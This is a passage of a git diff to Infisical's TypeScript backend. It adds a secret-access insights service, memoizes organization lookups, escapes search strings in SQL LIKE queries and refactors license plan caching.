el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -1053,7 +1060,9 @@ export const groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -1130,7 +1139,9 @@ export const groupServiceFactory = ({ const groupRoles = groupMembership.roles.map((el) => el.customRoleSlug || el.role); const [rolePermissionDetails] = await permissionService.getOrgPermissionByRoles(groupRoles, actorOrgId); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(actorOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize(requestMemoKeys.orgFindById(actorOrgId), () => + orgDAL.findById(actorOrgId) + ); // check if user has broader or equal to privileges than group const permissionBoundary = validatePrivilegeChangeOperation( @@ -1166,7 +1177,8 @@ export const groupServiceFactory = ({ identityIds: [identityId], identityDAL, membershipDAL, - identityGroupMembershipDAL + identityGroupMembershipDAL, + membershipGroupDAL }); await cleanUpSubOrgProjectMemberships({ diff --git a/backend/src/ee/services/group/group-types.ts b/backend/src/ee/services/group/group-types.ts index 30ebe121b9b..6c42df5272c 100644 --- a/backend/src/ee/services/group/group-types.ts +++ b/backend/src/ee/services/group/group-types.ts @@ -148,6 +148,7 @@ export type TRemoveIdentitiesFromGroup = { identityDAL: Pick; membershipDAL: Pick; identityGroupMembershipDAL: Pick; + membershipGroupDAL: Pick; }; export type TConvertPendingGroupAdditionsToGroupMemberships = { diff --git a/backend/src/ee/services/insights/insights-service.ts b/backend/src/ee/services/insights/insights-service.ts new file mode 100644 index 00000000000..a1071ea1480 --- /dev/null +++ b/backend/src/ee/services/insights/insights-service.ts @@ -0,0 +1,498 @@ +import { ForbiddenError } from "@casl/ability"; + +// import geoip from "geoip-lite"; +import { ActionProjectType, IdentityAuthMethod } from "@app/db/schemas"; +import { TAuditLogDALFactory } from "@app/ee/services/audit-log/audit-log-dal"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; +import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; +import { ProjectPermissionInsightsActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; +import { TSecretRotationV2DALFactory } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-dal"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; +import { withCache } from "@app/lib/cache/with-cache"; +import { BadRequestError } from "@app/lib/errors"; +import { OrgServiceActor } from "@app/lib/types"; +import { ActorType } from "@app/services/auth/auth-type"; +import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service"; +import { TReminderDALFactory } from "@app/services/reminder/reminder-dal"; +import { TSecretFolderDALFactory } from "@app/services/secret-folder/secret-folder-dal"; +import { TSecretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal"; +import { TUserDALFactory } from "@app/services/user/user-dal"; + +import { + // TGetAccessLocationsDTO, + TGetAccessVolumeDTO, + TGetAuthMethodDistributionDTO, + TGetInsightsCalendarDTO, + TGetInsightsSummaryDTO +} from "./insights-types"; + +type TInsightsServiceFactoryDep = { + permissionService: Pick; + licenseService: Pick; + auditLogDAL: Pick; + secretRotationV2DAL: Pick; + reminderDAL: Pick; + folderDAL: Pick; + secretV2BridgeDAL: Pick; + projectBotService: Pick; + userDAL: Pick; + keyStore: Pick; +}; + +export type TInsightsServiceFactory = ReturnType; + +const VALUE_EVENT_TYPES = [ + EventType.GET_SECRETS, + EventType.GET_SECRET, + EventType.DASHBOARD_GET_SECRET_VALUE, + EventType.DASHBOARD_GET_SECRET_VERSION_VALUE, + EventType.GET_SECRET_ROTATION_GENERATED_CREDENTIALS, + EventType.CREATE_DYNAMIC_SECRET_LEASE +]; + +const checkInsightsPermission = async ( + permissionService: TInsightsServiceFactoryDep["permissionService"], + licenseService: TInsightsServiceFactoryDep["licenseService"], + projectId: string, + actor: OrgServiceActor +) => { + const plan = await licenseService.getPlan(actor.orgId); + if (!plan.secretAccessInsights) { + throw new BadRequestError({ + message: "Failed to access insights due to plan restriction. Upgrade your plan to access insights." + }); + } + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorId: actor.id, + projectId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + actionProjectType: ActionProjectType.SecretManager + }); + + ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionInsightsActions.Read, ProjectPermissionSub.Insights); +}; + +export const insightsServiceFactory = ({ + permissionService, + licenseService, + auditLogDAL, + secretRotationV2DAL, + reminderDAL, + folderDAL, + secretV2BridgeDAL, + projectBotService, + userDAL, + keyStore +}: TInsightsServiceFactoryDep) => { + const fetchReminders = async (projectId: string, startDate: Date, endDate: Date) => { + const rawReminders = await reminderDAL.findByProjectAndDateRange({ projectId, startDate, endDate }); + if (!rawReminders.length) return []; + + const folderIds = [...new Set(rawReminders.map((r) => r.folderId))]; + const foldersWithPath = await folderDAL.findSecretPathByFolderIds(projectId, folderIds); + const folderRecord: Record = {}; + foldersWithPath.forEach((folder) => { + if (folder) folderRecord[folder.id] = folder.path; + }); + + return rawReminders.map((r) => ({ + id: r.id, + secretId: r.secretId ?? null, + secretKey: r.secretKey, + nextReminderDate: r.nextReminderDate, + message: r.message ?? null, + environment: r.envSlug, + secretPath: folderRecord[r.folderId] ?? "/", + repeatDays: r.repeatDays ?? null + })); + }; + + const getCalendar = async (dto: TGetInsightsCalendarDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, `calendar:${dto.year}-${dto.month}`); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(dto.projectId); + if (!shouldUseSecretV2Bridge) throw new BadRequestError({ message: "Project version not supported" }); + + // Pad by 1 day on each side so events near month boundaries are captured + // regardless of the caller's timezone offset from UTC. + const startDate = new Date(Date.UTC(dto.year, dto.month - 1, 0)); + const endDate = new Date(Date.UTC(dto.year, dto.month, 1, 23, 59, 59, 999)); + + const [rotations, reminders] = await Promise.all([ + secretRotationV2DAL.findByProjectAndDateRange({ projectId: dto.projectId, startDate, endDate }), + fetchReminders(dto.projectId, startDate, endDate) + ]); + + return { + rotations: rotations.map((r) => ({ + id: r.id, + name: r.name, + type: r.type, + nextRotationAt: r.nextRotationAt ?? null, + environment: r.environment.slug, + secretPath: r.folder.path, + secretKeys: r.secretKeys, + rotationInterval: r.rotationInterval, + rotationStatus: r.rotationStatus, + isAutoRotationEnabled: r.isAutoRotationEnabled + })), + reminders + }; + } + }); + }; + + const getAccessVolume = async (dto: TGetAccessVolumeDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, "access-volume"); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const now = new Date(); + const todayStr = now.toISOString().slice(0, 10); + const endDate = new Date(`${todayStr}T23:59:59.999Z`); + const startDate = new Date(`${todayStr}T00:00:00.000Z`); + startDate.setUTCDate(startDate.getUTCDate() - 6); + + const rows = await auditLogDAL.countByDateAndActor({ + orgId: actorDto.orgId, + projectId: dto.projectId, + eventTypes: VALUE_EVENT_TYPES, + startDate: startDate.toISOString(), + endDate: endDate.toISOString() + }); + + // Resolve user display names from userIds in audit log metadata + const userIds = [ + ...new Set( + rows + .filter((r) => r.actor === ActorType.USER) + .map((r) => (r.actorMetadata as Record | null)?.userId) + .filter(Boolean) as string[] + ) + ]; + const userNameMap = new Map(); + if (userIds.length > 0) { + const users = await userDAL.find({ $in: { id: userIds } }); + users.forEach((u) => { + const displayName = [u.firstName, u.lastName].filter(Boolean).join(" "); + if (displayName) userNameMap.set(u.id, displayName); + }); + } + + // Pre-populate the last 7 days + const dayMap = new Map>(); + for (let i = 6; i >= 0; i -= 1) { + const d = new Date(`${todayStr}T00:00:00.000Z`); + d.setUTCDate(d.getUTCDate() - i); + dayMap.set(d.toISOString().slice(0, 10), new Map()); + } + + rows.forEach((row) => { + const dateKey = typeof row.date === "string" ? row.date : new Date(row.date).toISOString().slice(0, 10); + const actorMap = dayMap.get(dateKey); + if (!actorMap) return; + + const actorMeta = row.actorMetadata as Record | null; + let actorName: string; + if (row.actor === ActorType.USER && actorMeta?.userId) { + actorName = userNameMap.get(actorMeta.userId) || actorMeta.email || actorMeta.username || "Unknown"; + } else if (row.actor === ActorType.USER) { + actorName = actorMeta?.email || actorMeta?.username || "Unknown"; + } else { + actorName = actorMeta?.name || actorMeta?.identityId || "Unknown"; + } + const actorKey = `${row.actor}:${actorName}`; + + const existing = actorMap.get(actorKey); + if (existing) { + existing.count += row.count; + } else { + actorMap.set(actorKey, { name: actorName, type: row.actor, count: row.count }); + } + }); + + const days = Array.from(dayMap.entries()).map(([date, actorMap]) => { + const actors = Array.from(actorMap.values()).sort((a, b) => b.count - a.count); + const total = actors.reduce((sum, a) => sum + a.count, 0); + return { date, total, actors }; + }); + + return { days }; + } + }); + }; + + // const getAccessLocations = async (dto: TGetAccessLocationsDTO, actorDto: OrgServiceActor) => { + // await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + // const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, `access-locations:${dto.days}`); + // return withCache(cacheKey, async () => { + // const endDate = new Date(); + // const startDate = new Date(); + // startDate.setUTCDate(startDate.getUTCDate() - dto.days); + + // const ipRows = await auditLogDAL.countByIpAddress({ + // orgId: actorDto.orgId, + // projectId: dto.projectId, + // eventTypes: VALUE_EVENT_TYPES, + // startDate: startDate.toISOString(), + // endDate: endDate.toISOString() + // }); + + // const locationMap = new Map(); + + // const isPrivateIp = (ip: string) => + // ip === "127.0.0.1" || + // ip === "::1" || + // ip === "::ffff:127.0.0.1" || + // ip.startsWith("10.") || + // ip.startsWith("172.16.") || + // ip.startsWith("172.17.") || + // ip.startsWith("172.18.") || + // ip.startsWith("172.19.") || + // ip.startsWith("172.20.") || + // ip.startsWith("172.21.") || + // ip.startsWith("172.22.") || + // ip.startsWith("172.23.") || + // ip.startsWith("172.24.") || + // ip.startsWith("172.25.") || + // ip.startsWith("172.26.") || + // ip.startsWith("172.27.") || + // ip.startsWith("172.28.") || + // ip.startsWith("172.29.") || + // ip.startsWith("172.30.") || + // ip.startsWith("172.31.") || + // ip.startsWith("192.168."); + + // ipRows.forEach(({ ipAddress: ip, count }) => { + // if (isPrivateIp(ip)) { + // const key = "Local Network:LOCAL"; + // const existing = locationMap.get(key); + // if (existing) { + // existing.count += count; + // } else { + // locationMap.set(key, { lat: 0, lng: 0, city: "Local Network", country: "LOCAL", count }); + // } + // return; + // } + + // const geo = geoip.lookup(ip); + // if (!geo || !geo.ll) return; + + // const city = geo.city || geo.region || ""; + // const key = `${city}:${geo.country}`; + // const existing = locationMap.get(key); + // if (existing) { + // existing.count += count; + // } else { + // locationMap.set(key, { + // lat: geo.ll[0], + // lng: geo.ll[1], + // city, + // country: geo.country, + // count + // }); + // } + // }); + + // return { + // locations: Array.from(locationMap.values()).sort((a, b) => b.count - a.count) + // }; + // }); + // }; + + const getAuthMethodDistribution = async (dto: TGetAuthMethodDistributionDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache(dto.projectId, `auth-methods:${dto.days}`); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const endDate = new Date(); + const startDate = new Date(); + startDate.setUTCDate(startDate.getUTCDate() - dto.days); + + const authRows = await auditLogDAL.countByAuthMethod({ + orgId: actorDto.orgId, + projectId: dto.projectId, + eventTypes: VALUE_EVENT_TYPES, + startDate: startDate.toISOString(), + endDate: endDate.toISOString() + }); + + const methodCounts = new Map(); + + const authMethodLabels: Record = { + email: "Email", + google: "Google", + github: "GitHub", + gitlab: "GitLab", + "okta-saml": "Okta SAML", + "azure-saml": "Azure SAML", + "jumpcloud-saml": "JumpCloud SAML", + "google-saml": "Google SAML", + "keycloak-saml": "Keycloak SAML", + ldap: "LDAP", + oidc: "OIDC" + }; + + const identityAuthMethodLabels: Record = { + [IdentityAuthMethod.UNIVERSAL_AUTH]: "Universal Auth", + [IdentityAuthMethod.TOKEN_AUTH]: "Token Auth", + [IdentityAuthMethod.KUBERNETES_AUTH]: "Kubernetes", + [IdentityAuthMethod.GCP_AUTH]: "GCP Auth", + [IdentityAuthMethod.AWS_AUTH]: "AWS Auth", + [IdentityAuthMethod.AZURE_AUTH]: "Azure Auth", + [IdentityAuthMethod.OIDC_AUTH]: "OIDC", + [IdentityAuthMethod.JWT_AUTH]: "JWT Auth", + [IdentityAuthMethod.LDAP_AUTH]: "LDAP Auth", + [IdentityAuthMethod.ALICLOUD_AUTH]: "AliCloud Auth", + [IdentityAuthMethod.TLS_CERT_AUTH]: "TLS Certificate", + [IdentityAuthMethod.OCI_AUTH]: "OCI Auth", + [IdentityAuthMethod.SPIFFE_AUTH]: "SPIFFE Auth" + }; + + authRows.forEach((row) => { + const actorMeta = row.actorMetadata as Record | null; + let method = "Unknown"; + + if (row.actor === "user") { + const raw = (actorMeta?.authMethod as string) || "Unknown"; + method = authMethodLabels[raw] || raw; + } else if (row.actor === "identity") { + const identityAuth = actorMeta?.authMethod as IdentityAuthMethod | undefined; + method = identityAuth ? identityAuthMethodLabels[identityAuth] || identityAuth : "Unknown"; + } else if (row.actor === "service") { + method = "Service Token"; + } else { + method = row.actor; + } + + methodCounts.set(method, (methodCounts.get(method) || 0) + (row.count || 0)); + }); + + const methods = Array.from(methodCounts.entries()) + .map(([method, count]) => ({ method, count })) + .sort((a, b) => b.count - a.count); + + return { methods }; + } + }); + }; + + const getSummary = async (dto: TGetInsightsSummaryDTO, actorDto: OrgServiceActor) => { + await checkInsightsPermission(permissionService, licenseService, dto.projectId, actorDto); + + const cacheKey = KeyStorePrefixes.InsightsCache( + dto.projectId, + `summary:${dto.staleSecretsOffset ?? 0}:${dto.staleSecretsLimit ?? 50}` + ); + return withCache({ + keyStore, + key: cacheKey, + ttlSeconds: KeyStoreTtls.InsightsCacheInSeconds, + fetcher: async () => { + const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(dto.projectId); + if (!shouldUseSecretV2Bridge) throw new BadRequestError({ message: "Project version not supported" }); + + const now = new Date(); + const in7Days = new Date(now); + in7Days.setDate(now.getDate() + 7); + const lookback90Days = new Date(now); + lookback90Days.setDate(now.getDate() - 90); + const staleThreshold = lookback90Days; + + // Fetch upcoming rotations (by date range) and all failed rotations (no date filter) in parallel + // Use 90-day lookback to capture overdue items without unbounded historical queries + const [upcomingRotationsRaw, allProjectRotations, reminders] = await Promise.all([ + secretRotationV2DAL.findByProjectAndDateRange({ + projectId: dto.projectId, + startDate: lookback90Days, + endDate: in7Days + }), + secretRotationV2DAL.findByProject(dto.projectId), + fetchReminders(dto.projectId, lookback90Days, in7Days) + ]); + + const mapRotation = (r: (typeof allProjectRotations)[number]) => ({ + name: r.name, + environment: r.environment.slug, + secretPath: r.folder.path, + nextRotationAt: r.nextRotationAt ?? null, + rotationStatus: r.rotationStatus + }); + + const mapReminder = (r: (typeof reminders)[number]) => ({ + secretKey: r.secretKey, + environment: r.environment, + secretPath: r.secretPath, + nextReminderDate: r.nextReminderDate + }); + + const upcomingRotations = upcomingRotationsRaw.map(mapRotation); + + const failedRotations = allProjectRotations.filter((r) => r.rotationStatus === "failed").map(mapRotation); + const upcomingReminders = reminders.filter((r) => new Date(r.nextReminderDate) >= now).map(mapReminder); + const overdueReminders = reminders.filter((r) => new Date(r.nextReminderDate) < now).map(mapReminder); + + const [rawStaleSecrets, totalStaleCount] = await Promise.all([ + secretV2BridgeDAL.findStaleByProject(dto.projectId, staleThreshold, { + offset: dto.staleSecretsOffset ?? 0, + limit: dto.staleSecretsLimit ?? 50 + }), + secretV2BridgeDAL.countStaleByProject(dto.projectId, staleThreshold) + ]); + + // Resolve folder paths for stale secrets + const staleFolderIds = [...new Set(rawStaleSecrets.map((s) => s.folderId))]; + const staleFolders = staleFolderIds.length + ? await folderDAL.findSecretPathByFolderIds(dto.projectId, staleFolderIds) + : []; + const staleFolderMap: Record = {}; + staleFolders.forEach((f) => { + if (f) staleFolderMap[f.id] = f.path; + }); + + const staleSecrets = rawStaleSecrets.map((s) => ({ + key: s.key, + environment: s.environment, + secretPath: staleFolderMap[s.folderId] ?? "/", + updatedAt: s.updatedAt + })); + + return { + upcomingRotations, + failedRotations, + upcomingReminders, + overdueReminders, + staleSecrets, + totalStaleCount + }; + } + }); + }; + + return { + getCalendar, + getAccessVolume, + // getAccessLocations, + getAuthMethodDistribution, + getSummary + }; +}; diff --git a/backend/src/ee/services/insights/insights-types.ts b/backend/src/ee/services/insights/insights-types.ts new file mode 100644 index 00000000000..4705b5c6093 --- /dev/null +++ b/backend/src/ee/services/insights/insights-types.ts @@ -0,0 +1,25 @@ +export type TGetInsightsCalendarDTO = { + projectId: string; + month: number; + year: number; +}; + +export type TGetAccessVolumeDTO = { + projectId: string; +}; + +export type TGetAccessLocationsDTO = { + projectId: string; + days: number; +}; + +export type TGetAuthMethodDistributionDTO = { + projectId: string; + days: number; +}; + +export type TGetInsightsSummaryDTO = { + projectId: string; + staleSecretsOffset?: number; + staleSecretsLimit?: number; +}; diff --git a/backend/src/ee/services/kmip/kmip-client-dal.ts b/backend/src/ee/services/kmip/kmip-client-dal.ts index 2650ebad075..0a15ce7a9a0 100644 --- a/backend/src/ee/services/kmip/kmip-client-dal.ts +++ b/backend/src/ee/services/kmip/kmip-client-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TKmipClients } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols } from "@app/lib/knex"; import { OrderByDirection } from "@app/lib/types"; @@ -56,7 +57,7 @@ export const kmipClientDALFactory = (db: TDbClient) => { .where("projectId", projectId) .where((qb) => { if (search) { - void qb.whereILike("name", `%${search}%`); + void qb.whereILike("name", `%${sanitizeSqlLikeString(search)}%`); } }) .select< diff --git a/backend/src/ee/services/kmip/kmip-operation-service.ts b/backend/src/ee/services/kmip/kmip-operation-service.ts index 25acdf11ecc..d635c1942bf 100644 --- a/backend/src/ee/services/kmip/kmip-operation-service.ts +++ b/backend/src/ee/services/kmip/kmip-operation-service.ts @@ -6,7 +6,6 @@ import { KmipOperationType, recordKmipOperationMetric } from "@app/lib/telemetry import { TKmsKeyDALFactory } from "@app/services/kms/kms-key-dal"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsKeyUsage } from "@app/services/kms/kms-types"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; import { OrgPermissionKmipActions, OrgPermissionSubjects } from "../permission/org-permission"; import { TPermissionServiceFactory } from "../permission/permission-service-types"; @@ -26,7 +25,6 @@ type TKmipOperationServiceFactoryDep = { kmsService: TKmsServiceFactory; kmsDAL: TKmsKeyDALFactory; kmipClientDAL: TKmipClientDALFactory; - projectDAL: Pick; permissionService: Pick; }; @@ -35,7 +33,6 @@ export type TKmipOperationServiceFactory = ReturnType { @@ -470,8 +467,6 @@ export const kmipOperationServiceFactory = ({ }); } - const project = await projectDAL.findById(projectId); - const kmsKey = await kmsService.importKeyMaterial({ name, key: Buffer.from(key, "base64"), @@ -479,7 +474,7 @@ export const kmipOperationServiceFactory = ({ isReserved: false, projectId, keyUsage: KmsKeyUsage.ENCRYPT_DECRYPT, - orgId: project.orgId, + orgId: actorOrgId, kmipMetadata }); diff --git a/backend/src/ee/services/ldap-config/ldap-config-service.ts b/backend/src/ee/services/ldap-config/ldap-config-service.ts index 7a21480f445..aae3b758f9e 100644 --- a/backend/src/ee/services/ldap-config/ldap-config-service.ts +++ b/backend/src/ee/services/ldap-config/ldap-config-service.ts @@ -14,6 +14,8 @@ import { addUsersToGroupByUserIds, removeUsersFromGroupByUserIds } from "@app/ee import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal"; import { throwOnPlanSeatLimitReached } from "@app/ee/services/license/license-fns"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { sanitizeEmail, validateEmail } from "@app/lib/validator/validate-email"; import { TAuthLoginFactory } from "@app/services/auth/auth-login-service"; @@ -149,7 +151,7 @@ export const ldapConfigServiceFactory = ({ "Failed to create LDAP configuration due to plan restriction. Upgrade plan to create LDAP configuration." }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -277,7 +279,7 @@ export const ldapConfigServiceFactory = ({ "Failed to update LDAP configuration due to plan restriction. Upgrade plan to update LDAP configuration." }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -415,7 +417,6 @@ export const ldapConfigServiceFactory = ({ }); } - // Verify that the email domain (if verified on the platform) belongs to this org await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); @@ -426,7 +427,7 @@ export const ldapConfigServiceFactory = ({ aliasType: UserAliasType.LDAP }); - const organization = await orgDAL.findOrgById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!organization) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); if (userAlias) { @@ -631,7 +632,7 @@ export const ldapConfigServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${token}`, recipients: [user.email], substitutions: { code: token diff --git a/backend/src/ee/services/license/__mocks__/license-fns.ts b/backend/src/ee/services/license/__mocks__/license-fns.ts index 7ea2ab6c1b1..721672bc32c 100644 --- a/backend/src/ee/services/license/__mocks__/license-fns.ts +++ b/backend/src/ee/services/license/__mocks__/license-fns.ts @@ -36,7 +36,9 @@ export const getDefaultOnPremFeatures = () => { enterpriseAppConnections: true, machineIdentityAuthTemplates: false, pkiLegacyTemplates: false, - emailDomainVerification: true + emailDomainVerification: true, + gatewayPool: false, + fips: true }; }; diff --git a/backend/src/ee/services/license/license-fns.ts b/backend/src/ee/services/license/license-fns.ts index b75ef22b5ee..15e350d2de2 100644 --- a/backend/src/ee/services/license/license-fns.ts +++ b/backend/src/ee/services/license/license-fns.ts @@ -105,6 +105,7 @@ export const getDefaultOnPremFeatures = (): TFeatureSet => ({ projectTemplates: false, kmip: false, gateway: false, + gatewayPool: false, sshHostGroups: false, secretScanning: false, enterpriseSecretSyncs: false, diff --git a/backend/src/ee/services/license/license-service.ts b/backend/src/ee/services/license/license-service.ts index c8e311621f6..b8506d41444 100644 --- a/backend/src/ee/services/license/license-service.ts +++ b/backend/src/ee/services/license/license-service.ts @@ -10,11 +10,13 @@ import { CronJob } from "cron"; import { Knex } from "knex"; import { OrganizationActionScope } from "@app/db/schemas"; -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { TEnvConfig } from "@app/lib/config/env"; import { verifyOfflineLicense } from "@app/lib/crypto"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from "@app/services/org/org-dal"; import { TProjectDALFactory } from "@app/services/project/project-dal"; @@ -63,9 +65,6 @@ export type TLicenseServiceFactory = ReturnType; const LICENSE_SERVER_CLOUD_LOGIN = "/api/auth/v1/license-server-login"; const LICENSE_SERVER_ON_PREM_LOGIN = "/api/auth/v1/license-login"; -const LICENSE_SERVER_CLOUD_PLAN_TTL = 5 * 60; // 5 mins -const FEATURE_CACHE_KEY = (orgId: string) => `infisical-cloud-plan-${orgId}`; - export const licenseServiceFactory = ({ orgDAL, permissionService, @@ -201,7 +200,7 @@ export const licenseServiceFactory = ({ logger.info(`getPlan: attempting to fetch plan for [orgId=${orgId}] [projectId=${projectId}]`); try { if (instanceType === InstanceType.Cloud) { - const cachedPlan = await keyStore.getItem(FEATURE_CACHE_KEY(orgId)); + const cachedPlan = await keyStore.getItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); if (cachedPlan) { logger.info(`getPlan: plan fetched from cache [orgId=${orgId}] [projectId=${projectId}]`); return JSON.parse(cachedPlan) as TFeatureSet; @@ -239,8 +238,8 @@ export const licenseServiceFactory = ({ currentPlan.identitiesUsed = identityUsed; await keyStore.setItemWithExpiry( - FEATURE_CACHE_KEY(org.id), - LICENSE_SERVER_CLOUD_PLAN_TTL, + KeyStorePrefixes.LicenseCloudPlan(org.id), + KeyStoreTtls.LicenseCloudPlanInSeconds, JSON.stringify(currentPlan) ); @@ -252,8 +251,8 @@ export const licenseServiceFactory = ({ `getPlan: encountered an error when fetching pan [orgId=${orgId}] [projectId=${projectId}] [error]` ); await keyStore.setItemWithExpiry( - FEATURE_CACHE_KEY(orgId), - LICENSE_SERVER_CLOUD_PLAN_TTL, + KeyStorePrefixes.LicenseCloudPlan(orgId), + KeyStoreTtls.LicenseCloudPlanInSeconds, JSON.stringify(onPremFeatures) ); return onPremFeatures; @@ -264,7 +263,7 @@ export const licenseServiceFactory = ({ }; const refreshPlan = async (orgId: string) => { - await keyStore.deleteItem(FEATURE_CACHE_KEY(orgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); if (instanceType === InstanceType.Cloud) { await getPlan(orgId); } @@ -307,7 +306,7 @@ export const licenseServiceFactory = ({ quantityIdentities }); } - await keyStore.deleteItem(FEATURE_CACHE_KEY(rootOrgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(rootOrgId)); } else if (instanceType === InstanceType.EnterpriseOnPrem) { const usedSeats = await licenseDAL.countOfOrgMembers(null, tx); const usedIdentitySeats = await licenseDAL.countOrgUsersAndIdentities(null, tx); @@ -391,7 +390,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -406,7 +405,7 @@ export const licenseServiceFactory = ({ `/api/license-server/v1/customers/${organization.customerId}/session/trial`, { success_url } ); - await keyStore.deleteItem(FEATURE_CACHE_KEY(orgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); return { url }; }; @@ -430,7 +429,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: "Organization not found" @@ -498,7 +497,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -581,7 +580,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -625,7 +624,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -660,7 +659,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => 